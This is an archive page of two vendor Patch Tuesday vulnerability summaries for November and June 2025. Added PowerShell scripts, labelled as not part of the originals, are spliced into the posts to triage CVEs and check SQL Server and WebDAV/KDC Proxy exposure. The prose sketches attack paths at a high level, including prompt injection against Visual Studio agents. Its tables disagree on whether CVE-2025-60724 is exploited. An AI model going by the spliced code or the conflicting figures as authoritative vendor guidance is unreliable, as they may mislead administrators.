Tag Archives: Vulnerability management

Patch Tuesday – November 2025

Post Syndicated from Adam Barnett original https://www.rapid7.com/blog/post/em-patch-tuesday-november-2025

Microsoft is publishing 66 new vulnerabilities today, which is far fewer than we’ve come to expect in recent months. There’s a lone exploited-in-the-wild zero-day vulnerability, which Microsoft assesses as critical severity, although there’s apparently no public disclosure yet. Three critical remote code execution (RCE) vulnerabilities are patched today; happily, Microsoft currently assesses all three as less likely to see exploitation. Five browser vulnerabilities and a dozen or so fixes for Azure Linux (aka Mariner) have already been published separately this month, and are not included in the total.

Windows GDI+: critical 0-day RCE

Faced with a fresh stack of Patch Tuesday vulns, there are a few different ways to prioritize our analysis. Do we start with vulns exploited in the wild? Pre-authentication RCEs? The vuln with the highest CVSS base score? The vuln which is likely to affect just about every asset running Microsoft software? Any of these are sensible avenues of approach, and today, all roads lead to CVE-2025-60724. As the advisory notes, in the worst-case scenario, an attacker could exploit this vulnerability by uploading a malicious document to a vulnerable web service. The advisory doesn’t spell out the context of code execution, but if all the stars align for the attacker, the prize could be remote code execution as SYSTEM via the network without any need for an existing foothold. While this vuln almost certainly isn’t wormable, it’s clearly very serious and is surely a top priority for just about anyone considering how to approach this month’s patches.
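One way to turn those triage questions into a repeatable ordering, as an added example that is not Rapid7's code: a PowerShell function that scores each advisory so that in-the-wild exploitation outranks public disclosure, which outranks a critical rating, which outranks RCE impact, with CVSS only breaking ties inside a band. The rows are constructed here from this month's summary tables; the Critical column is filled from the prose above (the tables do not carry severity), and the weights are this example's own choice.

```powershell
# Added example (not Rapid7 code): order a month's advisories by the triage
# questions in the text. Rows are constructed from the November summary tables;
# Critical is Yes only where the prose says Microsoft rates the vuln critical.
$rows = @'
CVE,Title,Exploited,Disclosed,CVSS,Critical
CVE-2025-60724,GDI+ Remote Code Execution Vulnerability,Yes,No,9.8,Yes
CVE-2025-62215,Windows Kernel Elevation of Privilege Vulnerability,Yes,No,7,No
CVE-2025-59499,Microsoft SQL Server Elevation of Privilege Vulnerability,No,No,8.8,Yes
CVE-2025-62204,Microsoft SharePoint Remote Code Execution Vulnerability,No,No,8,No
CVE-2025-62199,Microsoft Office Remote Code Execution Vulnerability,No,No,7.8,Yes
CVE-2025-62214,Visual Studio Remote Code Execution Vulnerability,No,No,6.7,Yes
CVE-2025-59504,Azure Monitor Agent Remote Code Execution Vulnerability,No,No,7.3,No
'@ | ConvertFrom-Csv

function Get-PatchTriageOrder {
    <# Returns the rows with a TriageScore attached, highest first. The weights
       impose a strict ordering (exploited > disclosed > critical > RCE) rather
       than pretending to be a CVSS formula; CVSS only breaks ties in a band. #>
    param([Parameter(Mandatory)][object[]]$Findings)

    $scored = foreach ($f in $Findings) {
        $score = [double]$f.CVSS                      # tie-breaker, 0..10
        if ($f.Exploited -eq 'Yes') { $score += 1000 }   # exploited in the wild
        if ($f.Disclosed -eq 'Yes') { $score += 500 }    # public disclosure
        if ($f.Critical  -eq 'Yes') { $score += 100 }    # Microsoft critical rating
        if ($f.Title -match 'Remote Code Execution') { $score += 50 }
        $f | Add-Member -NotePropertyName TriageScore -NotePropertyValue $score -PassThru
    }
    $scored | Sort-Object TriageScore -Descending
}

Get-PatchTriageOrder -Findings $rows |
    Format-Table CVE, TriageScore, Exploited, Disclosed, Critical, CVSS, Title -AutoSize
```

Run as-is it puts CVE-2025-60724 first, the exploited kernel EoP second, and the three remaining criticals ahead of the unrated RCEs; swapping the constructed rows for a CSV export of a real month's advisories is the only change needed to reuse it.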

The weakness underlying CVE-2025-60724 is CWE-122: Heap-based buffer overflow, a concept which celebrated its 50th birthday several years ago. As the authors of the original 1972 paper noted: “If the code makes use of an internal buffer, there is a possibility that a user could input enough data to overwrite other portions of the program’s private storage.” Regarding computer security in general, they opined that “this problem is neither hopeless nor solved. It is, however, perfectly clear […] that solutions to the problem will not occur spontaneously, nor will they come from the various well-intentioned attempts to provide security as an add-on to existing systems.”

Office: critical ACE

Once again, we find ourselves wondering: “when is remote code execution really remote?” CVE-2025-62199 describes a critical RCE vulnerability in Microsoft Office, where exploitation relies on the user downloading and opening a malicious file. The attacker is remote, and that’s enough to satisfy the definition, even if the action is taken on the local system by the unwitting user. Anyone hoping that the Preview Pane is not a vector will be sadly disappointed, and this certainly increases the probability of real-world exploitation, since there’s no need for the attacker to craft a way around those pesky warnings about enabling dangerous content. Just scrolling through a list of emails in Outlook could be enough.

Visual Studio: critical RCE

Some attacks are straightforward, with only a single step needed to reach the finish line. Others, like Visual Studio critical RCE CVE-2025-62214, require that the attacker execute a complex chain of events. In this case, exploitation demands multi-stage abuse of recent advances in Visual Studio AI development capabilities, including prompt injection, Agent interaction, and triggering a build. The advisory doesn’t describe the context of code execution. If the prize is simply code execution on an asset in the context of the user, there’s no obvious advancement for the attacker, since exploitation already requires code execution on the asset by the attacker or the targeted user. The brief description of the attack chain does mention that the attacker would need to trigger a build. On that basis, possible outcomes might include execution in an elevated context, or compromised build artifacts, although the advisory does not provide enough information to be certain either way.

SQL Server: critical EoP

SQL Server admins should take note of CVE-2025-59499, which describes an elevation of privilege (EoP) vulnerability. Although some level of existing privileges is required, successful exploitation will permit an attacker to run arbitrary Transact-SQL (T-SQL) commands. T-SQL is the language which SQL Server databases and clients use to communicate with one another. Although the default configuration for SQL Server disables the xp_cmdshell functionality which allows direct callouts to the underlying OS, there’s more than one way to shine a penny, and the only safe assumption here is that exploitation will lead to code execution in the context of SQL Server itself. Patches are available for all supported versions of SQL Server.
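A quick way to see what "code execution in the context of SQL Server itself" would mean on a given instance, as an added example rather than anything from the Rapid7 post: it reads the sp_configure switches that open a path from T-SQL to the host (xp_cmdshell, plus two others that are also off by default), the engine's service account, and the build number to compare against the patched version. It assumes the SqlServer PowerShell module (Invoke-Sqlcmd) and a Windows-authenticated login holding VIEW SERVER STATE; sys.configurations, sys.dm_server_services and SERVERPROPERTY are standard SQL Server catalog objects.

```powershell
# Added example (not Rapid7 code). Assumes the SqlServer module (Invoke-Sqlcmd)
# and a login with VIEW SERVER STATE on the target instance.
function Get-SqlOsCalloutSurface {
    param([Parameter(Mandatory)][string]$ServerInstance)

    # value_in_use is the live setting; 1 means the feature is switched on.
    $cfg = Invoke-Sqlcmd -ServerInstance $ServerInstance -Query @"
SELECT name, CAST(value_in_use AS int) AS value_in_use
FROM sys.configurations
WHERE name IN ('xp_cmdshell', 'Ole Automation Procedures', 'clr enabled');
"@
    # Whose identity an attacker would inherit: the engine's own service account.
    $svc = Invoke-Sqlcmd -ServerInstance $ServerInstance -Query @"
SELECT servicename, service_account FROM sys.dm_server_services;
"@
    $ver = Invoke-Sqlcmd -ServerInstance $ServerInstance -Query @"
SELECT CAST(SERVERPROPERTY('ProductVersion') AS nvarchar(64)) AS product_version;
"@

    $enabled = @{}
    foreach ($row in $cfg) { $enabled[$row.name] = ([int]$row.value_in_use -eq 1) }

    [pscustomobject]@{
        Instance             = $ServerInstance
        ProductVersion       = $ver.product_version
        XpCmdshellEnabled    = $enabled['xp_cmdshell']
        OleAutomationEnabled = $enabled['Ole Automation Procedures']
        ClrEnabled           = $enabled['clr enabled']
        EngineServiceAccount = ($svc | Where-Object servicename -like 'SQL Server (*').service_account
    }
}

function Test-SqlOsCalloutsDisabled {
    # True only when every direct T-SQL-to-host path is at its default (off).
    param([Parameter(Mandatory)]$Surface)
    -not ($Surface.XpCmdshellEnabled -or $Surface.OleAutomationEnabled -or $Surface.ClrEnabled)
}

function Disable-SqlXpCmdshell {
    # Restores the default the text describes. 'show advanced options' must be
    # on for sp_configure to accept xp_cmdshell; it is switched back afterwards.
    param([Parameter(Mandatory)][string]$ServerInstance)
    Invoke-Sqlcmd -ServerInstance $ServerInstance -Query @"
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0; RECONFIGURE;
EXEC sp_configure 'show advanced options', 0; RECONFIGURE;
"@
}

$surface = Get-SqlOsCalloutSurface -ServerInstance 'SQLHOST01'   # placeholder instance name
$surface | Format-List
"All OS callout paths at default (disabled): $(Test-SqlOsCalloutsDisabled -Surface $surface)"
```

The service account line is the one to read first: a SQL Server engine running as LocalSystem or a domain admin turns "code execution in the context of SQL Server" into a far worse outcome than the same bug on an instance using a virtual service account. The instance name is a placeholder.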

Microsoft lifecycle update

Following the sweeping lifecycle changes seen in October 2025, Microsoft is taking it fairly easy this month. The only significant transition today is the end of support for Windows 11 Home and Pro 23H2. Unlike the demise of Windows 10, this much smaller change won’t affect most people; a small number of older CPUs might not make the cut, since Windows 11 24H2 introduces a requirement for a couple of newer CPU instruction sets. Microsoft provides lists of compatible Intel, AMD, and Qualcomm CPU series.

Summary charts

A bar chart showing vulnerability count by component for Microsoft Patch Tuesday 2025-Nov

A bar chart showing vulnerability count by impact for Microsoft Patch Tuesday 2025-Nov

A heat map showing impact type by component for Microsoft Patch Tuesday 2025-Nov

Summary tables

Azure vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2025-59504 Azure Monitor Agent Remote Code Execution Vulnerability No No 7.3

Browser vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2025-12729 Chromium: CVE-2025-12729 Inappropriate implementation in Omnibox No No N/A
CVE-2025-12728 Chromium: CVE-2025-12728 Inappropriate implementation in Omnibox No No N/A
CVE-2025-12727 Chromium: CVE-2025-12727 Inappropriate implementation in V8 No No N/A
CVE-2025-12726 Chromium: CVE-2025-12726 Inappropriate implementation in Views No No N/A
CVE-2025-12725 Chromium: CVE-2025-12725 Out of bounds write in WebGPU No No N/A

Developer Tools vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2025-62222 Agentic AI and Visual Studio Code Remote Code Execution Vulnerability No No 8.8
CVE-2025-62449 Microsoft Visual Studio Code CoPilot Chat Extension Security Feature Bypass Vulnerability No No 6.8
CVE-2025-62214 Visual Studio Remote Code Execution Vulnerability No No 6.7
CVE-2025-62453 GitHub Copilot and Visual Studio Code Security Feature Bypass Vulnerability No No 5

Mariner Open Source Software vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2024-25621 containerd affected by a local privilege escalation via wide permissions on CRI directory No No 7.3
CVE-2025-10966 missing SFTP host verification with wolfSSH No No 6.8
CVE-2025-64329 containerd CRI server: Host memory exhaustion through Attach goroutine leak No No N/A

Microsoft Dynamics vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2025-62210 Dynamics 365 Field Service (online) Spoofing Vulnerability No No 8.7
CVE-2025-62211 Dynamics 365 Field Service (online) Spoofing Vulnerability No No 8.7
CVE-2025-62206 Microsoft Dynamics 365 (On-Premises) Information Disclosure Vulnerability No No 6.5

Microsoft Office vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2025-62204 Microsoft SharePoint Remote Code Execution Vulnerability No No 8
CVE-2025-62199 Microsoft Office Remote Code Execution Vulnerability No No 7.8
CVE-2025-62216 Microsoft Office Remote Code Execution Vulnerability No No 7.8
CVE-2025-62205 Microsoft Office Remote Code Execution Vulnerability No No 7.8
CVE-2025-60727 Microsoft Excel Remote Code Execution Vulnerability No No 7.8
CVE-2025-62200 Microsoft Excel Remote Code Execution Vulnerability No No 7.8
CVE-2025-62201 Microsoft Excel Remote Code Execution Vulnerability No No 7.8
CVE-2025-62203 Microsoft Excel Remote Code Execution Vulnerability No No 7.8
CVE-2025-60726 Microsoft Excel Information Disclosure Vulnerability No No 7.1
CVE-2025-62202 Microsoft Excel Information Disclosure Vulnerability No No 7.1
CVE-2025-60722 Microsoft OneDrive for Android Elevation of Privilege Vulnerability No No 6.5
CVE-2025-59240 Microsoft Excel Information Disclosure Vulnerability No No 5.5
CVE-2025-60728 Microsoft Excel Information Disclosure Vulnerability No No 4.3

Open Source Software vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2025-62220 Windows Subsystem for Linux GUI Remote Code Execution Vulnerability No No 8.8
CVE-2025-12863 Libxml2: namespace use-after-free in xmlsettreedoc() function of libxml2 No No 7.5
CVE-2025-64433 KubeVirt Arbitrary Container File Read No No 6.5
CVE-2025-40107 can: hi311x: fix null pointer dereference when resuming from sleep before interface was enabled No No 5.5
CVE-2025-60753 An issue was discovered in libarchive bsdtar before version 3.8.1 in function apply_substitution in file tar/subst.c when processing crafted -s substitution rules. This can cause unbounded memory allocation and lead to denial of service (Out-of-Memory crash). No No 5.5
CVE-2025-12875 mruby array.c ary_fill_exec out-of-bounds write No No 5.3
CVE-2025-64435 KubeVirt VMI Denial-of-Service (DoS) Using Pod Impersonation No No 5.3
CVE-2025-64437 KubeVirt Isolation Detection Flaw Allows Arbitrary File Permission Changes No No 5
CVE-2025-64434 KubeVirt Improper TLS Certificate Management Handling Allows API Identity Spoofing No No 4.7
CVE-2025-64432 KubeVirt Affected by an Authentication Bypass in Kubernetes Aggregation Layer No No 4.7
CVE-2025-40109 crypto: rng – Ensure set_ent is always present No No 4.2
CVE-2025-52881 runc: LSM labels can be bypassed with malicious config using dummy procfs files No No N/A
CVE-2025-31133 runc container escape via “masked path” abuse due to mount race conditions No No N/A
CVE-2025-52565 container escape due to /dev/console mount and related races No No N/A
CVE-2025-64436 KubeVirt Excessive Role Permissions Could Enable Unauthorized VMI Migrations Between Nodes No No N/A

Other vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2025-30398 Nuance PowerScribe 360 Information Disclosure Vulnerability No No 8.1

SQL Server vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2025-59499 Microsoft SQL Server Elevation of Privilege Vulnerability No No 8.8

System Center vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2025-47179 Configuration Manager Elevation of Privilege Vulnerability No No 6.7

Windows vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2025-59511 Windows WLAN Service Elevation of Privilege Vulnerability No No 7.8
CVE-2025-60713 Windows Routing and Remote Access Service (RRAS) Elevation of Privilege Vulnerability No No 7.8
CVE-2025-60718 Windows Administrator Protection Elevation of Privilege Vulnerability No No 7.8
CVE-2025-60721 Windows Administrator Protection Elevation of Privilege Vulnerability No No 7.8
CVE-2025-60707 Multimedia Class Scheduler Service (MMCSS) Driver Elevation of Privilege Vulnerability No No 7.8
CVE-2025-60710 Host Process for Windows Tasks Elevation of Privilege Vulnerability No No 7.8
CVE-2025-59507 Windows Speech Runtime Elevation of Privilege Vulnerability No No 7
CVE-2025-59508 Windows Speech Recognition Elevation of Privilege Vulnerability No No 7
CVE-2025-62215 Windows Kernel Elevation of Privilege Vulnerability Yes No 7
CVE-2025-59515 Windows Broadcast DVR User Service Elevation of Privilege Vulnerability No No 7
CVE-2025-60717 Windows Broadcast DVR User Service Elevation of Privilege Vulnerability No No 7
CVE-2025-62218 Microsoft Wireless Provisioning System Elevation of Privilege Vulnerability No No 7
CVE-2025-62219 Microsoft Wireless Provisioning System Elevation of Privilege Vulnerability No No 7
CVE-2025-60716 DirectX Graphics Kernel Elevation of Privilege Vulnerability No No 7
CVE-2025-60708 Storvsp.sys Driver Denial of Service Vulnerability No No 6.5
CVE-2025-60723 DirectX Graphics Kernel Denial of Service Vulnerability No No 6.3
CVE-2025-59509 Windows Speech Recognition Information Disclosure Vulnerability No No 5.5
CVE-2025-62208 Windows License Manager Information Disclosure Vulnerability No No 5.5
CVE-2025-62209 Windows License Manager Information Disclosure Vulnerability No No 5.5
CVE-2025-60706 Windows Hyper-V Information Disclosure Vulnerability No No 5.5
CVE-2025-60724 GDI+ Remote Code Execution Vulnerability Yes No 9.8

Windows ESU vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2025-62452 Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability No No 8
CVE-2025-60715 Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability No No 8
CVE-2025-60720 Windows Transport Driver Interface (TDI) Translation Driver Elevation of Privilege Vulnerability No No 7.8
CVE-2025-59505 Windows Smart Card Reader Elevation of Privilege Vulnerability No No 7.8
CVE-2025-60703 Windows Remote Desktop Services Elevation of Privilege Vulnerability No No 7.8
CVE-2025-60714 Windows OLE Remote Code Execution Vulnerability No No 7.8
CVE-2025-60709 Windows Common Log File System Driver Elevation of Privilege Vulnerability No No 7.8
CVE-2025-60705 Windows Client-Side Caching Elevation of Privilege Vulnerability No No 7.8
CVE-2025-59514 Microsoft Streaming Service Proxy Elevation of Privilege Vulnerability No No 7.8
CVE-2025-59512 Customer Experience Improvement Program (CEIP) Elevation of Privilege Vulnerability No No 7.8
CVE-2025-60704 Windows Kerberos Elevation of Privilege Vulnerability No No 7.5
CVE-2025-60719 Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability No No 7
CVE-2025-62217 Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability No No 7
CVE-2025-62213 Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability No No 7
CVE-2025-59506 DirectX Graphics Kernel Elevation of Privilege Vulnerability No No 7
CVE-2025-59510 Windows Routing and Remote Access Service (RRAS) Denial of Service Vulnerability No No 5.5
CVE-2025-59513 Windows Bluetooth RFCOM Protocol Driver Information Disclosure Vulnerability No No 5.5
CVE-2025-60724 GDI+ Remote Code Execution Vulnerability Yes No 9.8

Windows Microsoft Office ESU vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2025-60724 GDI+ Remote Code Execution Vulnerability No No 9.8

Updates

  • 2025-11-11: clarified the description of CVE-2025-62214.

Patch Tuesday – June 2025

Post Syndicated from Adam Barnett original https://blog.rapid7.com/2025/06/10/patch-tuesday-june-2025/


Microsoft is addressing 67 vulnerabilities this June 2025 Patch Tuesday. Microsoft has evidence of in-the-wild exploitation for just one of the vulnerabilities published today, and that is reflected in CISA KEV. Separately, Microsoft is aware of existing public disclosure for one other freshly published vulnerability. Microsoft’s luck holds for a ninth consecutive Patch Tuesday, since neither of today’s zero-day vulnerabilities is evaluated as critical severity at time of publication. Today also sees the publication of eight critical remote code execution (RCE) vulnerabilities. Two browser vulnerabilities have already been published separately this month, and are not included in the total.

Windows WebDAV: zero-day RCE

Remember the WebDAV standard? It has been seven years since Microsoft last published a vulnerability in the Windows implementation of WebDAV, and today’s publication of CVE-2025-33053 is the first zero-day vulnerability on record. Originally dreamed up in the 1990s to support interactivity on the web, WebDAV may be familiar to Exchange admins and users of a certain vintage, since older versions of Exchange, up to and including Exchange Server 2010, supported WebDAV as a means for interacting with mailboxes and public folders.

It will surprise no one that Windows still more or less supports WebDAV, and that turns out to be a bit of a problem. Microsoft acknowledges Check Point Research (CPR) on the advisory; CPR in turn attributes exploitation of CVE-2025-33053 to an APT, which they track as Stealth Falcon, an established threat actor with a long-running interest in governments and government-adjacent entities across the Middle East and the surrounding area.

Curiously, the Microsoft advisory does not mention that the Windows implementation of WebDAV is listed as deprecated since November 2023, which in practical terms means that the WebClient service no longer starts by default. The advisory also has attack complexity as low, which means that exploitation does not require preparation of the target environment in any way that is beyond the attacker’s control. Exploitation relies on the user clicking a malicious link. It’s not clear how an asset would be immediately vulnerable if the service isn’t running, but all versions of Windows receive a patch, including those released since the deprecation of WebClient, like Server 2025 and Windows 11 24H2. On Server 2025, for instance, it’s still possible to install the WebDAV Redirector server feature, which then causes the WebClient service to appear.

SMB client: zero-day EoP

Publicly disclosed elevation of privilege (EoP) zero-day vulnerabilities that lead to SYSTEM are always going to be worth a closer look, and CVE-2025-33073 is no exception. The advisory sets out that the easiest path to exploitation simply requires the user to connect to a malicious SMB server controlled by the attacker. It’s not entirely clear from the advisory whether simply connecting is enough to trigger exploitation, or whether successful authentication is required, since there is currently conflicting language in two separate FAQ entries with almost-identical titles: “How could an attacker exploit this/the vulnerability?” It may well be that Microsoft will come back around and clarify this wording, but in the meantime the only safe assumption is that fortune favours the attacker.

Windows KDC Proxy: critical RCE

The Windows KDC Proxy Service (KPSSVC) receives a patch today for CVE-2025-33071, which describes a critical unauthenticated RCE vulnerability where exploitation is via abuse of a cryptographic protocol weakness. The good news is that only Windows Server assets configured as a Kerberos Key Distribution Center Proxy Protocol server are affected — happily, this is not enabled as standard configuration for a domain controller — and exploitation requires that the attacker win a race condition. The bad news is that Microsoft considers exploitation more likely regardless, and since a KDC proxy helps Kerberos requests from untrusted networks more easily access trusted assets without any need for a direct TCP connection from the client to the domain controller, the trade-off here is that the KDC proxy itself is quite likely to be exposed to an untrusted network. Patching this vulnerability should be top of mind for affected defenders this month.
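Both the WebDAV paragraph above and this one come down to the same question for a defender: is the optional component actually present and running on this host? The following PowerShell report, an added example and not part of the Rapid7 post, answers it for the WebClient service (CVE-2025-33053), the WebDAV Redirector feature that brings WebClient back on Server 2025, and the KDC Proxy service (CVE-2025-33071). The service and feature names (WebClient, KPSSVC, WebDAV-Redirector) are the standard Windows ones; the report layout and the priority rule are this example's own.

```powershell
# Added example (not Rapid7 code): report whether this host exposes the two
# optional components discussed above, so the June patches for CVE-2025-33053
# and CVE-2025-33071 can be queued first where they matter most.
function Get-JuneExposureReport {
    [CmdletBinding()]
    param()

    $webClient = Get-Service -Name WebClient -ErrorAction SilentlyContinue
    $kdcProxy  = Get-Service -Name KPSSVC    -ErrorAction SilentlyContinue

    $report = [ordered]@{
        ComputerName       = $env:COMPUTERNAME
        # WebClient is the WebDAV Mini-Redirector: deprecated and no longer
        # started by default, but still installed on every supported build.
        WebClientPresent   = [bool]$webClient
        WebClientStatus    = if ($webClient) { "$($webClient.Status)" } else { 'NotInstalled' }
        WebClientStartType = if ($webClient) { "$($webClient.StartType)" } else { 'n/a' }
        # KPSSVC only exists where the KDC Proxy role has been set up.
        KdcProxyPresent    = [bool]$kdcProxy
        KdcProxyStatus     = if ($kdcProxy) { "$($kdcProxy.Status)" } else { 'NotInstalled' }
    }

    # Server SKUs: installing the WebDAV Redirector feature is what makes
    # WebClient reappear on Server 2025. Get-WindowsFeature is ServerManager-only.
    if (Get-Command Get-WindowsFeature -ErrorAction SilentlyContinue) {
        $feat = Get-WindowsFeature -Name WebDAV-Redirector -ErrorAction SilentlyContinue
        $report.WebDavRedirectorInstalled = [bool]($feat -and $feat.Installed)
    } else {
        $report.WebDavRedirectorInstalled = 'n/a (client SKU)'
    }

    [pscustomobject]$report
}

function Test-JunePatchFirst {
    # True when either service is live on this host. Every supported build still
    # receives the patch; this only says which hosts to reach before the others.
    param([Parameter(Mandatory)]$Report)
    ($Report.WebClientStatus -eq 'Running') -or ($Report.KdcProxyStatus -eq 'Running')
}

$r = Get-JuneExposureReport
$r | Format-List
"Patch CVE-2025-33053 / CVE-2025-33071 first on this host: $(Test-JunePatchFirst -Report $r)"
```

Run it across a fleet (for example through Invoke-Command) and the KdcProxyStatus column alone picks out the handful of servers the KDC Proxy paragraph is about; for WebClient, a StartType of Manual with a Running status is worth a second look, since the advisory's attack path needs only a user click once the service is up.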

Office preview pane: trio of critical RCEs

Microsoft expects that exploitation of three Office critical RCE vulns patched today is more likely. CVE-2025-47162, CVE-2025-47164, and CVE-2025-47167 share several attributes: each was discovered by prolific researcher 0x140ce, who topped the MSRC 2025 Q1 leaderboard, and each includes the Preview Pane as a vector, which always ups the ante for defenders. Admins responsible for installations of Microsoft 365 Apps for Enterprise — also confusingly referred to as “Microsoft 365 for Office” in the advisory FAQ — will have to hang on, since patches for today’s vulnerabilities aren’t yet available for that particular facet of the Microsoft 365 kaleidoscope.

Microsoft lifecycle update

June is a quiet month for Microsoft product lifecycle changes. The next batch of significant Microsoft product lifecycle status changes are due in July 2025, when the SQL Server 2012 ESU program draws to a close, along with support for Visual Studio 2022 17.8 LTSC.


Summary charts

Azure vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2025-47977 Nuance Digital Engagement Platform Spoofing Vulnerability No No 7.6

Browser vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2025-5419 Chromium: CVE-2025-5419 Out of bounds read and write in V8 No No N/A
CVE-2025-5068 Chromium: CVE-2025-5068 Use after free in Blink No No N/A

Developer Tools vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2025-47962 Windows SDK Elevation of Privilege Vulnerability No No 7.8
CVE-2025-30399 .NET and Visual Studio Remote Code Execution Vulnerability No No 7.5
CVE-2025-47959 Visual Studio Remote Code Execution Vulnerability No No 7.1

Microsoft Dynamics vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2025-47966 Power Automate Elevation of Privilege Vulnerability No No 9.8

Microsoft Office vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2025-47172 Microsoft SharePoint Server Remote Code Execution Vulnerability No No 8.8
CVE-2025-47163 Microsoft SharePoint Server Remote Code Execution Vulnerability No No 8.8
CVE-2025-47166 Microsoft SharePoint Server Remote Code Execution Vulnerability No No 8.8
CVE-2025-47957 Microsoft Word Remote Code Execution Vulnerability No No 8.4
CVE-2025-47162 Microsoft Office Remote Code Execution Vulnerability No No 8.4
CVE-2025-47953 Microsoft Office Remote Code Execution Vulnerability No No 8.4
CVE-2025-47164 Microsoft Office Remote Code Execution Vulnerability No No 8.4
CVE-2025-47167 Microsoft Office Remote Code Execution Vulnerability No No 8.4
CVE-2025-47168 Microsoft Word Remote Code Execution Vulnerability No No 7.8
CVE-2025-47169 Microsoft Word Remote Code Execution Vulnerability No No 7.8
CVE-2025-47170 Microsoft Word Remote Code Execution Vulnerability No No 7.8
CVE-2025-47175 Microsoft PowerPoint Remote Code Execution Vulnerability No No 7.8
CVE-2025-47176 Microsoft Outlook Remote Code Execution Vulnerability No No 7.8
CVE-2025-47173 Microsoft Office Remote Code Execution Vulnerability No No 7.8
CVE-2025-47165 Microsoft Excel Remote Code Execution Vulnerability No No 7.8
CVE-2025-47174 Microsoft Excel Remote Code Execution Vulnerability No No 7.8
CVE-2025-47968 Microsoft AutoUpdate (MAU) Elevation of Privilege Vulnerability No No 7.8
CVE-2025-47171 Microsoft Outlook Remote Code Execution Vulnerability No No 6.7

Windows vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2025-33067 Windows Task Scheduler Elevation of Privilege Vulnerability No No 8.4
CVE-2025-29828 Windows Schannel Remote Code Execution Vulnerability No No 8.1
CVE-2025-32725 DHCP Server Service Denial of Service Vulnerability No No 7.5
CVE-2025-33050 DHCP Server Service Denial of Service Vulnerability No No 7.5
CVE-2025-32721 Windows Recovery Driver Elevation of Privilege Vulnerability No No 7.3
CVE-2025-32719 Windows Storage Management Provider Information Disclosure Vulnerability No No 5.5
CVE-2025-33058 Windows Storage Management Provider Information Disclosure Vulnerability No No 5.5
CVE-2025-33059 Windows Storage Management Provider Information Disclosure Vulnerability No No 5.5
CVE-2025-33061 Windows Storage Management Provider Information Disclosure Vulnerability No No 5.5
CVE-2025-33062 Windows Storage Management Provider Information Disclosure Vulnerability No No 5.5
CVE-2025-33063 Windows Storage Management Provider Information Disclosure Vulnerability No No 5.5
CVE-2025-33065 Windows Storage Management Provider Information Disclosure Vulnerability No No 5.5
CVE-2025-24068 Windows Storage Management Provider Information Disclosure Vulnerability No No 5.5
CVE-2025-24069 Windows Storage Management Provider Information Disclosure Vulnerability No No 5.5
CVE-2025-24065 Windows Storage Management Provider Information Disclosure Vulnerability No No 5.5
CVE-2025-33055 Windows Storage Management Provider Information Disclosure Vulnerability No No 5.5
CVE-2025-47956 Windows Security App Spoofing Vulnerability No No 5.5
CVE-2025-33052 Windows DWM Core Library Information Disclosure Vulnerability No No 5.5
CVE-2025-33069 Windows App Control for Business Security Feature Bypass Vulnerability No No 5.1
CVE-2025-47969 Windows Virtualization-Based Security (VBS) Information Disclosure Vulnerability No No 4.4

Windows ESU vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2025-33073 Windows SMB Client Elevation of Privilege Vulnerability No Yes 8.8
CVE-2025-33064 Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability No No 8.8
CVE-2025-33066 Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability No No 8.8
CVE-2025-33053 Web Distributed Authoring and Versioning (WEBDAV) Remote Code Execution Vulnerability Yes No 8.8
CVE-2025-32710 Windows Remote Desktop Services Remote Code Execution Vulnerability No No 8.1
CVE-2025-33070 Windows Netlogon Elevation of Privilege Vulnerability No No 8.1
CVE-2025-33071 Windows KDC Proxy Service (KPSSVC) Remote Code Execution Vulnerability No No 8.1
CVE-2025-32718 Windows SMB Client Elevation of Privilege Vulnerability No No 7.8
CVE-2025-47955 Windows Remote Access Connection Manager Elevation of Privilege Vulnerability No No 7.8
CVE-2025-32716 Windows Media Elevation of Privilege Vulnerability No No 7.8
CVE-2025-32714 Windows Installer Elevation of Privilege Vulnerability No No 7.8
CVE-2025-33075 Windows Installer Elevation of Privilege Vulnerability No No 7.8
CVE-2025-32713 Windows Common Log File System Driver Elevation of Privilege Vulnerability No No 7.8
CVE-2025-32712 Win32k Elevation of Privilege Vulnerability No No 7.8
CVE-2025-33068 Windows Standards-Based Storage Management Service Denial of Service Vulnerability No No 7.5
CVE-2025-33056 Windows Local Security Authority (LSA) Denial of Service Vulnerability No No 7.5
CVE-2025-32724 Local Security Authority Subsystem Service (LSASS) Denial of Service Vulnerability No No 7.5
CVE-2025-3052 Cert CC: CVE-2025-3052 InsydeH2O Secure Boot Bypass No No 6.7
CVE-2025-33057 Windows Local Security Authority (LSA) Denial of Service Vulnerability No No 6.5
CVE-2025-32715 Remote Desktop Protocol Client Information Disclosure Vulnerability No No 6.5
CVE-2025-32722 Windows Storage Port Driver Information Disclosure Vulnerability No No 5.5
